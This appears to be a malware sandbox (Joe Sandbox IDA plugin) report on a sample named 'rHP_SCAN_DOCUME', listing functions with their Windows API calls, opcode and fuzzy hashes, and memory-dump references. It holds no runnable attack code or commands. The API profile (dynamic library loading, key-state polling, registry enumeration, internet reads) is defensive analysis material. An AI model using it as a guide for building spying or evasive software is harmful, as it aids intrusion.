Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 395137d8fc2a1d6a095280bd11e30f87f792e8154261622e8c9bc8f5e37dba8a
Instruction ID: 05b726201daf8e20938d714133a81ea4b6961d5603cbac2fcd8b1f922d1b162c
Opcode Fuzzy Hash: 395137d8fc2a1d6a095280bd11e30f87f792e8154261622e8c9bc8f5e37dba8a
Instruction Fuzzy Hash: 20517EB24087445BC724DB94C8919DB73ECFF88344F00492EE689D3151EE74E68887AB

Function 0089B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00819CB3: _wcslen.LIBCMT ref: 00819CBD

Part of subcall function 0089C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0089B6AE,?,?), ref: 0089C9B5
Part of subcall function 0089C998: _wcslen.LIBCMT ref: 0089C9F1
Part of subcall function 0089C998: _wcslen.LIBCMT ref: 0089CA68
Part of subcall function 0089C998: _wcslen.LIBCMT ref: 0089CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0089BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0089BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0089BB63
RegCloseKey.ADVAPI32(?,?), ref: 0089BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0089BBB3

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 81a94357b7a5e8f4f398af7051d7a486b315801828dc15d41cb7a3f72739b1fe
Instruction ID: adca6da3d2f0b635c40fcc00d335442d703c13191090965d275f18db2bcb3df3
Opcode Fuzzy Hash: 81a94357b7a5e8f4f398af7051d7a486b315801828dc15d41cb7a3f72739b1fe
Instruction Fuzzy Hash: 4A61C031208241EFD714EF14D990E6ABBE9FF84318F18855CF4998B2A2DB31ED45CB92

Function 00878BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00878BCD
VariantClear.OLEAUT32 ref: 00878C3E
VariantClear.OLEAUT32 ref: 00878C9D
VariantClear.OLEAUT32(?), ref: 00878D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00878D3B

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 228207fd30c23ebda0b092dd299a5f675328bbb17c7c39bf1215130ba83fe721
Instruction ID: b442e11746f46f4395e162824327115b1dc0624e97c368362e7d0ebc6cb875bb
Opcode Fuzzy Hash: 228207fd30c23ebda0b092dd299a5f675328bbb17c7c39bf1215130ba83fe721
Instruction Fuzzy Hash: F85189B1A00219EFCB10CF28C884AAABBF8FF8D314B158559E919DB354E730E911CF90

Function 00888AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00888BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00888BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00888C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00888C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00888C5F

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: aa04596198baecdd10595922d5ed0bf8cd43b61ea36ddb8aaeb3a6590702764d
Instruction ID: 9ae282b72db3ea27cf956987baa7b15bc76fd29619bfa79659b18cf7facb33d0
Opcode Fuzzy Hash: aa04596198baecdd10595922d5ed0bf8cd43b61ea36ddb8aaeb3a6590702764d
Instruction Fuzzy Hash: 44515D35A00215DFCB01DF68C881AADBBF6FF49314F088458E849AB362DB31ED81CB91

Function 00898EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00898F40
GetProcAddress.KERNEL32(00000000,?), ref: 00898FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00898FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00899032
FreeLibrary.KERNEL32(00000000), ref: 00899052

Part of subcall function 0082F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00881043,?,7735E610), ref: 0082F6E6
Part of subcall function 0082F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0086FA64,00000000,00000000,?,?,00881043,?,7735E610,?,0086FA64), ref: 0082F70D

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: b80ea0c358ed2fd48de22e54cf6773e11fa8f7e692dded6fbce9491ea0d33508
Instruction ID: 60b929f097bcce6ee7fefe4b696a56eedd6c8d6b18f006e0c5331054859c23ff
Opcode Fuzzy Hash: b80ea0c358ed2fd48de22e54cf6773e11fa8f7e692dded6fbce9491ea0d33508
Instruction Fuzzy Hash: E2512835600605DFCB11EF58C4948ADBBF5FF49314B0980A8E85ADB762DB31ED85CB91

Function 008A6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 008A6C33
SetWindowLongW.USER32(?,000000EC,?), ref: 008A6C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 008A6C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0088AB79,00000000,00000000), ref: 008A6C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 008A6CC7

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: be86487edc27d339706033dabdab7b285bcfad06b14370ebdb6f81e7b36ae26d
Instruction ID: bd6812b4266632d4af5f71d46ea338a4ac321d2ff4d322e41208087d612b0896
Opcode Fuzzy Hash: be86487edc27d339706033dabdab7b285bcfad06b14370ebdb6f81e7b36ae26d
Instruction Fuzzy Hash: 7641D535A04104AFEB24DF28CC58FA57BA5FB0B370F190228F895E76E5E771AD61C650

Function 00842051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008420C3
_free.LIBCMT ref: 008420E3

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e2b5dff7edb89556bad23e4817dbd98baa6b0be6689f8ec7a23aba83bca66215
Instruction ID: 0c0055029585b6a5ede671083009e926b2b4ba059ae6854e0cbd3e1833c98b1e
Opcode Fuzzy Hash: e2b5dff7edb89556bad23e4817dbd98baa6b0be6689f8ec7a23aba83bca66215
Instruction Fuzzy Hash: 6F41E132A006089FCB20DF78C880A5EB7F5FF88314F5545A9F615EB396DA31AD01CB81

Function 0082912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00829141
ScreenToClient.USER32(00000000,?), ref: 0082915E
GetAsyncKeyState.USER32(00000001), ref: 00829183
GetAsyncKeyState.USER32(00000002), ref: 0082919D

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: d3beb79cae16491d18229e920deb59dd84695c200b86e5edef35cf6217164da5
Instruction ID: 487ef05559f8078eb386c19c77f42f922bac231d16cb43d34cee7b314fb19e01
Opcode Fuzzy Hash: d3beb79cae16491d18229e920deb59dd84695c200b86e5edef35cf6217164da5
Instruction Fuzzy Hash: 6B41407190861AFBDF159F69D844BEEB774FB06324F204216E465E72D0C7345990CB91

Function 00883874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 008838CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00883922
TranslateMessage.USER32(?), ref: 0088394B
DispatchMessageW.USER32(?), ref: 00883955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00883966

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: da56ae7c91a1cc332cfa292e2c3afa9ae4aa0af071271a27d38c9fd1ab40bb40
Instruction ID: 54e1788dc8e24537c2bb99be933a865cd014fac9accea3fa1a02fbf96a78e0fe
Opcode Fuzzy Hash: da56ae7c91a1cc332cfa292e2c3afa9ae4aa0af071271a27d38c9fd1ab40bb40
Instruction Fuzzy Hash: 9931D3709043869EEF35EB34DC88BB67FA8FB07B04F040569E466C65A1E7F49A85CB11

Function 0088CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0088C21E,00000000), ref: 0088CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0088CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0088C21E,00000000), ref: 0088CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0088C21E,00000000), ref: 0088CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0088C21E,00000000), ref: 0088CFF2

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: f1055fc55bed037c1dac8b718fa3633102a9f7d43cc6e61ad4fd8f81e91f82dc
Instruction ID: a2eefc12e4f49fbb293572487e69442805c34a452a1bd162efcf19371fee9f55
Opcode Fuzzy Hash: f1055fc55bed037c1dac8b718fa3633102a9f7d43cc6e61ad4fd8f81e91f82dc
Instruction Fuzzy Hash: 34315E71504205EFEB20EFA9D884AABBBF9FF15354B10442EF606D2545DF70AE40DB60

Function 00871901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00871915
PostMessageW.USER32(00000001,00000201,00000001), ref: 008719C1
Sleep.KERNEL32(00000000,?,?,?), ref: 008719C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 008719DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 008719E2

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: ea9dad20c58bbc962efde06cd4799ad01080e6824f7de6061472e84456c9402e
Instruction ID: 1622a46f3886f23d5150b917ca281bb22efce44ab8c76fee601111a4dea10629
Opcode Fuzzy Hash: ea9dad20c58bbc962efde06cd4799ad01080e6824f7de6061472e84456c9402e
Instruction Fuzzy Hash: BF317871A00219AFDB10CFACC999B9E3BB5FB55315F108229FA25E72D1C770D945CB90

Function 008A5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 008A5745
SendMessageW.USER32(?,00001074,?,00000001), ref: 008A579D
_wcslen.LIBCMT ref: 008A57AF
_wcslen.LIBCMT ref: 008A57BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 008A5816

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 2b13f0d87eef7fcde1340343d4e886b8dfe9366d589eb1493fd3ddb22734e601
Instruction ID: 3a73f42fc2894542e092b88369ffe703e3402cede2c68ddfd457d8f160162a41
Opcode Fuzzy Hash: 2b13f0d87eef7fcde1340343d4e886b8dfe9366d589eb1493fd3ddb22734e601
Instruction Fuzzy Hash: 4C21B671904618DAEB20CF64DC84AEE7BB8FF46324F108216F929EB580D77499C5CF91

Function 0082990F Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 008298CC
SetTextColor.GDI32(?,?), ref: 008298D6
SetBkMode.GDI32(?,00000001), ref: 008298E9
GetStockObject.GDI32(00000005), ref: 008298F1
GetWindowLongW.USER32(?,000000EB), ref: 00829952

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Color$LongModeObjectStockTextWindow
String ID:
API String ID: 1860813098-0
Opcode ID: fba9b56133fc415a0e82017fc7bcf38dcb72e2a827c1603565bda1500cfb94ad
Instruction ID: 00c066718cb837de5afd814bbebea1668a8ce7d8586a1b89c4821747eaa1f388
Opcode Fuzzy Hash: fba9b56133fc415a0e82017fc7bcf38dcb72e2a827c1603565bda1500cfb94ad
Instruction Fuzzy Hash: D521A1715492909FDB228B34EC59AA53FA0FF13335B19019DE5D2CA1A2D6364992CB50

Function 00890930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00890951
GetForegroundWindow.USER32 ref: 00890968
GetDC.USER32(00000000), ref: 008909A4
GetPixel.GDI32(00000000,?,00000003), ref: 008909B0
ReleaseDC.USER32(00000000,00000003), ref: 008909E8

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 5c25c11687e209f88ee7c47804089b916926c28287e5f19c291028c5d6a2de1f
Instruction ID: 957d2352b0709b077422092f60b066b5011ea88aa13b213724da1bb7b1cd41ca
Opcode Fuzzy Hash: 5c25c11687e209f88ee7c47804089b916926c28287e5f19c291028c5d6a2de1f
Instruction Fuzzy Hash: 67218435A00204AFDB04EF69D944AAEBBE9FF45700F04846CF84AD7751DB70AC44CB50

Function 0084CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0084CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0084CDE9

Part of subcall function 00843820: RtlAllocateHeap.NTDLL(00000000,?,008E1444,?,0082FDF5,?,?,0081A976,00000010,008E1440,008113FC,?,008113C6,?,00811129), ref: 00843852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0084CE0F
_free.LIBCMT ref: 0084CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0084CE31

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 42a88adf63b974f84d6a2f45b31112d08fa93c2684b9b4ecaa6abf8d052761e7
Instruction ID: 378cebfd0605599f615f6e3086e9f1bcdaeb3be1f9379b8ff4d593c802daa1ba
Opcode Fuzzy Hash: 42a88adf63b974f84d6a2f45b31112d08fa93c2684b9b4ecaa6abf8d052761e7
Instruction Fuzzy Hash: 8A014F72A0361D7F37611ABAAC88D7B7E6DFEC7BA13150129F905D7201EF618D0291B1

Function 00829639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00829693
SelectObject.GDI32(?,00000000), ref: 008296A2
BeginPath.GDI32(?), ref: 008296B9
SelectObject.GDI32(?,00000000), ref: 008296E2

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 6f68c8e08b7de07214907c8fa42bb561097ddc9dd256406bd5def739d5794265
Instruction ID: aebf369782d2319621c43bdd1c05c81116c575f34e95cfd986090fad30061409
Opcode Fuzzy Hash: 6f68c8e08b7de07214907c8fa42bb561097ddc9dd256406bd5def739d5794265
Instruction Fuzzy Hash: EA217F30802355EBDF11AF28EC4CBA93FA8FB21315F900216F850EA1A2D37458D2CF90

Function 00875711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00875726
_memcmp.LIBVCRUNTIME ref: 00875744
_memcmp.LIBVCRUNTIME ref: 00875757
_memcmp.LIBVCRUNTIME ref: 0087576F
_memcmp.LIBVCRUNTIME ref: 00875787

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: a881648d6b5de5e7133eddd9446e4f752a53bd242223186b16e7bc57183cae58
Instruction ID: 634e45ce2ec735040f35416cd4ff9cdeceae41a79bf10c671ca393dc5a7247a4
Opcode Fuzzy Hash: a881648d6b5de5e7133eddd9446e4f752a53bd242223186b16e7bc57183cae58
Instruction Fuzzy Hash: C90192A1641A19BAE70C55159D86FBA635CFB627E8F00C020FE1CDA746F7A5ED1082E1

Function 00842DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0083F2DE,00843863,008E1444,?,0082FDF5,?,?,0081A976,00000010,008E1440,008113FC,?,008113C6), ref: 00842DFD
_free.LIBCMT ref: 00842E32
_free.LIBCMT ref: 00842E59
SetLastError.KERNEL32(00000000,00811129), ref: 00842E66
SetLastError.KERNEL32(00000000,00811129), ref: 00842E6F

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

